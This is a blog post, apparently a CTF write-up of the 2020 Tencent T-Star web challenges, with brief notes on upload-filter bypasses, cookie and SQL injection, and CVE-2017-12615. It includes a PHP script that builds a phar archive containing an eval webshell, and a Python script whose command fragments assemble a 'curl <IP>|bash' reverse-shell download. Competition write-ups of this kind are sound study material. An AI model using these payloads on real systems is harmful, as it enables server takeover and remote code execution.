iloveflag-blog

2020腾讯犀牛鸟网络安全T-Star高校挑战赛wp

字数统计: 422阅读时长: 2 min
2020/07/01 Share

题目一 签到

将木马先保存为jpg上传,burp改后缀

题目二 命令执行基础

题目三 你能爆破吗

admin/admin进入发现cookie为admin的base64加密,cookie注入


题目四 文件上传

上传图片结合马,别名pht绕过,发现检测文件头<?过滤,采用

1
<script language=’php’></script>

,且php也过滤,双写绕过


题目五 文件包含GetShell

生成myphar.phar,改名为phar.txt上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

try{
$p = new Phar("my.phar", 0, 'my.phar');
} catch (UnexpectedValueException $e) {
die('Could not open my.phar');
} catch (BadMethodCallException $e) {
echo 'technically, this cannot happen';
}

$p->startBuffering();
$p['file1.txt'] = 'file1';
$p['file2.txt'] = 'file2';
$p['file3.txt'] = 'file3';
$p['shell.php'] = '<?php eval($_POST[1]); ?>';
$p->setStub("<?php
Phar::mapPhar('myphar.phar');
__HALT_COMPILER();");

$p->stopBuffering();

?>


题目六 成绩单

基础sql注入

题目七 小猫咪踩灯泡

CVE-2017-12615

题目九 分析代码获得flag

HITCON2017(babyfirst-revenge)%20writeup/)
当时长度还是小于5
找到当时复现的脚本bash反弹回来完事了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import requests
from time import sleep
from urllib.parse import quote

payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',


'>bash',
'>\|\\', #\\转义|
'>86\\',
'>1\\',
'>8.\\',
'>3\\',
'>5.\\',
'>11\\',
'>7.\\',
'>4\\',
'>\ \\',
'>rl\\',
'>cu\\',
# exec
'sh _',
'sh g',
]



for i in payload:
assert len(i) < 7
r = requests.get('http://c5b32990.yunyansec.com/?1=' + quote(i) )
print(r.url)
sleep(0.2)


CATALOG
  1. 1. 题目一 签到
  2. 2. 题目二 命令执行基础
  3. 3. 题目三 你能爆破吗
  4. 4. 题目四 文件上传
  5. 5. 题目五 文件包含GetShell
  6. 6. 题目六 成绩单
  7. 7. 题目七 小猫咪踩灯泡
  8. 8. 题目九 分析代码获得flag